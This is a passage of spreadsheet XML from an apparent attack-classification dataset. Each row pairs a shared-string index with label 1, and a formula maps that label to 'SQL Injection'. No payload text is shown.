    <row r="18723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18723" s="1" t="s">
        <v>13154</v>
      </c>
      <c r="B18723">
        <v>1</v>
      </c>
      <c r="C18723" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18724" s="1" t="s">
        <v>15620</v>
      </c>
      <c r="B18724">
        <v>1</v>
      </c>
      <c r="C18724" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18725" s="1" t="s">
        <v>19448</v>
      </c>
      <c r="B18725">
        <v>1</v>
      </c>
      <c r="C18725" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18726" s="1" t="s">
        <v>14864</v>
      </c>
      <c r="B18726">
        <v>1</v>
      </c>
      <c r="C18726" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18727" s="1" t="s">
        <v>14077</v>
      </c>
      <c r="B18727">
        <v>1</v>
      </c>
      <c r="C18727" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18728" s="1" t="s">
        <v>13063</v>
      </c>
      <c r="B18728">
        <v>1</v>
      </c>
      <c r="C18728" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18729" s="1" t="s">
        <v>25372</v>
      </c>
      <c r="B18729">
        <v>1</v>
      </c>
      <c r="C18729" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18730" s="1" t="s">
        <v>25465</v>
      </c>
      <c r="B18730">
        <v>1</v>
      </c>
      <c r="C18730" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18731" s="1" t="s">
        <v>18883</v>
      </c>
      <c r="B18731">
        <v>1</v>
      </c>
      <c r="C18731" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18732" s="1" t="s">
        <v>17450</v>
      </c>
      <c r="B18732">
        <v>1</v>
      </c>
      <c r="C18732" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18733" s="1" t="s">
        <v>19783</v>
      </c>
      <c r="B18733">
        <v>1</v>
      </c>
      <c r="C18733" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18734" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18734" s="1" t="s">
        <v>19081</v>
      </c>
      <c r="B18734">
        <v>1</v>
      </c>
      <c r="C18734" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18735" s="1" t="s">
        <v>16317</v>
      </c>
      <c r="B18735">
        <v>1</v>
      </c>
      <c r="C18735" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18736" s="1" t="s">
        <v>25638</v>
      </c>
      <c r="B18736">
        <v>1</v>
      </c>
      <c r="C18736" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18737" s="1" t="s">
        <v>17017</v>
      </c>
      <c r="B18737">
        <v>1</v>
      </c>
      <c r="C18737" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18738" s="1" t="s">
        <v>24921</v>
      </c>
      <c r="B18738">
        <v>1</v>
      </c>
      <c r="C18738" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18739" s="1" t="s">
        <v>26054</v>
      </c>
      <c r="B18739">
        <v>1</v>
      </c>
      <c r="C18739" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18740" s="1" t="s">
        <v>15381</v>
      </c>
      <c r="B18740">
        <v>1</v>
      </c>
      <c r="C18740" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18741" s="1" t="s">
        <v>25185</v>
      </c>
      <c r="B18741">
        <v>1</v>
      </c>
      <c r="C18741" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18742" s="1" t="s">
        <v>17976</v>
      </c>
      <c r="B18742">
        <v>1</v>
      </c>
      <c r="C18742" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18743" s="1" t="s">
        <v>12111</v>
      </c>
      <c r="B18743">
        <v>1</v>
      </c>
      <c r="C18743" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18744" s="1" t="s">
        <v>14481</v>
      </c>
      <c r="B18744">
        <v>1</v>
      </c>
      <c r="C18744" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18745" s="1" t="s">
        <v>14958</v>
      </c>
      <c r="B18745">
        <v>1</v>
      </c>
      <c r="C18745" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18746" s="1" t="s">
        <v>16411</v>
      </c>
      <c r="B18746">
        <v>1</v>
      </c>
      <c r="C18746" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18747" s="1" t="s">
        <v>15782</v>
      </c>
      <c r="B18747">
        <v>1</v>
      </c>
      <c r="C18747" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18748" s="1" t="s">
        <v>13107</v>
      </c>
      <c r="B18748">
        <v>1</v>
      </c>
      <c r="C18748" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18749" s="1" t="s">
        <v>18564</v>
      </c>
      <c r="B18749">
        <v>1</v>
      </c>
      <c r="C18749" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18750" s="1" t="s">
        <v>25083</v>
      </c>
      <c r="B18750">
        <v>1</v>
      </c>
      <c r="C18750" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18751" s="1" t="s">
        <v>12873</v>
      </c>
      <c r="B18751">
        <v>1</v>
      </c>
      <c r="C18751" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18752" s="1" t="s">
        <v>19320</v>
      </c>
      <c r="B18752">
        <v>1</v>
      </c>
      <c r="C18752" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18753" s="1" t="s">
        <v>14082</v>
      </c>
      <c r="B18753">
        <v>1</v>
      </c>
      <c r="C18753" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18754" s="1" t="s">
        <v>24389</v>
      </c>
      <c r="B18754">
        <v>1</v>
      </c>
      <c r="C18754" s="7" t="str">
        <f t="shared" si="292"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18755" s="1" t="s">
        <v>13875</v>
      </c>
      <c r="B18755">
        <v>1</v>
      </c>
      <c r="C18755" s="7" t="str">
        <f t="shared" ref="C18755:C18818" si="293">IF(B18755=0,"No Attack", IF(B18755=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18756" s="1" t="s">
        <v>18123</v>
      </c>
      <c r="B18756">
        <v>1</v>
      </c>
      <c r="C18756" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18757" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18757" s="1" t="s">
        <v>18695</v>
      </c>
      <c r="B18757">
        <v>1</v>
      </c>
      <c r="C18757" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18758" s="1" t="s">
        <v>20038</v>
      </c>
      <c r="B18758">
        <v>1</v>
      </c>
      <c r="C18758" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18759" s="1" t="s">
        <v>26745</v>
      </c>
      <c r="B18759">
        <v>1</v>
      </c>
      <c r="C18759" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18760" s="1" t="s">
        <v>19621</v>
      </c>
      <c r="B18760">
        <v>1</v>
      </c>
      <c r="C18760" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18761" s="1" t="s">
        <v>16617</v>
      </c>
      <c r="B18761">
        <v>1</v>
      </c>
      <c r="C18761" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18762" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18762" s="1" t="s">
        <v>25905</v>
      </c>
      <c r="B18762">
        <v>1</v>
      </c>
      <c r="C18762" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18763" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18763" s="1" t="s">
        <v>24645</v>
      </c>
      <c r="B18763">
        <v>1</v>
      </c>
      <c r="C18763" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18764" s="1" t="s">
        <v>17574</v>
      </c>
      <c r="B18764">
        <v>1</v>
      </c>
      <c r="C18764" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18765" s="1" t="s">
        <v>20026</v>
      </c>
      <c r="B18765">
        <v>1</v>
      </c>
      <c r="C18765" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18766" s="1" t="s">
        <v>16872</v>
      </c>
      <c r="B18766">
        <v>1</v>
      </c>
      <c r="C18766" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18767" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18767" s="1" t="s">
        <v>16393</v>
      </c>
      <c r="B18767">
        <v>1</v>
      </c>
      <c r="C18767" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18768" s="1" t="s">
        <v>16877</v>
      </c>
      <c r="B18768">
        <v>1</v>
      </c>
      <c r="C18768" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18769" s="1" t="s">
        <v>16025</v>
      </c>
      <c r="B18769">
        <v>1</v>
      </c>
      <c r="C18769" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18770" s="1" t="s">
        <v>14072</v>
      </c>
      <c r="B18770">
        <v>1</v>
      </c>
      <c r="C18770" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18771" s="1" t="s">
        <v>16255</v>
      </c>
      <c r="B18771">
        <v>1</v>
      </c>
      <c r="C18771" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18772" s="1" t="s">
        <v>12840</v>
      </c>
      <c r="B18772">
        <v>1</v>
      </c>
      <c r="C18772" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18773" s="1" t="s">
        <v>26121</v>
      </c>
      <c r="B18773">
        <v>1</v>
      </c>
      <c r="C18773" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18774" s="1" t="s">
        <v>26372</v>
      </c>
      <c r="B18774">
        <v>1</v>
      </c>
      <c r="C18774" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18775" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18775" s="1" t="s">
        <v>18215</v>
      </c>
      <c r="B18775">
        <v>1</v>
      </c>
      <c r="C18775" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18776" s="1" t="s">
        <v>14834</v>
      </c>
      <c r="B18776">
        <v>1</v>
      </c>
      <c r="C18776" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18777" s="1" t="s">
        <v>26503</v>
      </c>
      <c r="B18777">
        <v>1</v>
      </c>
      <c r="C18777" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18778" s="1" t="s">
        <v>17079</v>
      </c>
      <c r="B18778">
        <v>1</v>
      </c>
      <c r="C18778" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18779" s="1" t="s">
        <v>26336</v>
      </c>
      <c r="B18779">
        <v>1</v>
      </c>
      <c r="C18779" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18780" s="1" t="s">
        <v>19773</v>
      </c>
      <c r="B18780">
        <v>1</v>
      </c>
      <c r="C18780" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18781" s="1" t="s">
        <v>19220</v>
      </c>
      <c r="B18781">
        <v>1</v>
      </c>
      <c r="C18781" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18782" s="1" t="s">
        <v>24815</v>
      </c>
      <c r="B18782">
        <v>1</v>
      </c>
      <c r="C18782" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18783" s="1" t="s">
        <v>13369</v>
      </c>
      <c r="B18783">
        <v>1</v>
      </c>
      <c r="C18783" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18784" s="1" t="s">
        <v>12994</v>
      </c>
      <c r="B18784">
        <v>1</v>
      </c>
      <c r="C18784" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18785" s="1" t="s">
        <v>25778</v>
      </c>
      <c r="B18785">
        <v>1</v>
      </c>
      <c r="C18785" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18786" s="1" t="s">
        <v>14219</v>
      </c>
      <c r="B18786">
        <v>1</v>
      </c>
      <c r="C18786" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18787" s="1" t="s">
        <v>19921</v>
      </c>
      <c r="B18787">
        <v>1</v>
      </c>
      <c r="C18787" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18788" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18788" s="1" t="s">
        <v>25568</v>
      </c>
      <c r="B18788">
        <v>1</v>
      </c>
      <c r="C18788" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18789" s="1" t="s">
        <v>13114</v>
      </c>
      <c r="B18789">
        <v>1</v>
      </c>
      <c r="C18789" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18790" s="1" t="s">
        <v>12717</v>
      </c>
      <c r="B18790">
        <v>1</v>
      </c>
      <c r="C18790" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18791" s="1" t="s">
        <v>15137</v>
      </c>
      <c r="B18791">
        <v>1</v>
      </c>
      <c r="C18791" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18792" s="1" t="s">
        <v>12838</v>
      </c>
      <c r="B18792">
        <v>1</v>
      </c>
      <c r="C18792" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18793" s="1" t="s">
        <v>19522</v>
      </c>
      <c r="B18793">
        <v>1</v>
      </c>
      <c r="C18793" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18794" s="1" t="s">
        <v>16942</v>
      </c>
      <c r="B18794">
        <v>1</v>
      </c>
      <c r="C18794" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18795" s="1" t="s">
        <v>17929</v>
      </c>
      <c r="B18795">
        <v>1</v>
      </c>
      <c r="C18795" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18796" s="1" t="s">
        <v>14642</v>
      </c>
      <c r="B18796">
        <v>1</v>
      </c>
      <c r="C18796" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18797" s="1" t="s">
        <v>25918</v>
      </c>
      <c r="B18797">
        <v>1</v>
      </c>
      <c r="C18797" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18798" s="1" t="s">
        <v>24545</v>
      </c>
      <c r="B18798">
        <v>1</v>
      </c>
      <c r="C18798" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18799" s="1" t="s">
        <v>15683</v>
      </c>
      <c r="B18799">
        <v>1</v>
      </c>
      <c r="C18799" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18800" s="1" t="s">
        <v>26660</v>
      </c>
      <c r="B18800">
        <v>1</v>
      </c>
      <c r="C18800" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18801" s="1" t="s">
        <v>17524</v>
      </c>
      <c r="B18801">
        <v>1</v>
      </c>
      <c r="C18801" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18802" s="1" t="s">
        <v>12463</v>
      </c>
      <c r="B18802">
        <v>1</v>
      </c>
      <c r="C18802" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18803" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18803" s="1" t="s">
        <v>18835</v>
      </c>
      <c r="B18803">
        <v>1</v>
      </c>
      <c r="C18803" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18804" s="1" t="s">
        <v>19879</v>
      </c>
      <c r="B18804">
        <v>1</v>
      </c>
      <c r="C18804" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18805" s="1" t="s">
        <v>14003</v>
      </c>
      <c r="B18805">
        <v>1</v>
      </c>
      <c r="C18805" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18806" s="1" t="s">
        <v>18681</v>
      </c>
      <c r="B18806">
        <v>1</v>
      </c>
      <c r="C18806" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18807" s="1" t="s">
        <v>14395</v>
      </c>
      <c r="B18807">
        <v>1</v>
      </c>
      <c r="C18807" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18808" s="1" t="s">
        <v>17465</v>
      </c>
      <c r="B18808">
        <v>1</v>
      </c>
      <c r="C18808" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18809" s="1" t="s">
        <v>14880</v>
      </c>
      <c r="B18809">
        <v>1</v>
      </c>
      <c r="C18809" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18810" s="1" t="s">
        <v>16038</v>
      </c>
      <c r="B18810">
        <v>1</v>
      </c>
      <c r="C18810" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18811" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18811" s="1" t="s">
        <v>13789</v>
      </c>
      <c r="B18811">
        <v>1</v>
      </c>
      <c r="C18811" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18812" s="1" t="s">
        <v>26704</v>
      </c>
      <c r="B18812">
        <v>1</v>
      </c>
      <c r="C18812" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18813" s="1" t="s">
        <v>18976</v>
      </c>
      <c r="B18813">
        <v>1</v>
      </c>
      <c r="C18813" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18814" s="1" t="s">
        <v>16851</v>
      </c>
      <c r="B18814">
        <v>1</v>
      </c>
      <c r="C18814" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18815" s="1" t="s">
        <v>15956</v>
      </c>
      <c r="B18815">
        <v>1</v>
      </c>
      <c r="C18815" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18816" s="1" t="s">
        <v>26701</v>
      </c>
      <c r="B18816">
        <v>1</v>
      </c>
      <c r="C18816" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18817" s="1" t="s">
        <v>16545</v>
      </c>
      <c r="B18817">
        <v>1</v>
      </c>
      <c r="C18817" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18818" s="1" t="s">
        <v>17707</v>
      </c>
      <c r="B18818">
        <v>1</v>
      </c>
      <c r="C18818" s="7" t="str">
        <f t="shared" si="293"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18819" s="1" t="s">
        <v>18755</v>
      </c>
      <c r="B18819">
        <v>1</v>
      </c>
      <c r="C18819" s="7" t="str">
        <f t="shared" ref="C18819:C18882" si="294">IF(B18819=0,"No Attack", IF(B18819=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18820" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18820" s="1" t="s">
        <v>16497</v>
      </c>
      <c r="B18820">
        <v>1</v>
      </c>
      <c r="C18820" s="7" t="str">
        <f t="shared" si="294"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18821" s="1" t="s">
        <v>26249</v>
      </c>
      <c r="B18821">
        <v>1</v>
      </c>
      <c r="C18821" s="7" t="str">
        <f t="shared" si="294"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18822" s="1" t="s">
        <v>13280</v>
      </c>
      <c r="B18822">
        <v>1</v>
      </c>
      <c r="C18822" s="7" t="str">
        <f t="shared" si="294"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18823" s="1" t="s">
        <v>18846</v>
      </c>
      <c r="B18823">
        <v>1</v>
      </c>
      <c r="C18823" s="7" t="str">
        <f t="shared" si="294"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18824" s="1" t="s">
        <v>18784</v>
      </c>
      <c r="B18824">
        <v>1</v>
      </c>
      <c r="C18824" s="7" t="str">
        <f t="shared" si="294"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="18825" spans="1:3" x14ac:dyDescent="0.3">
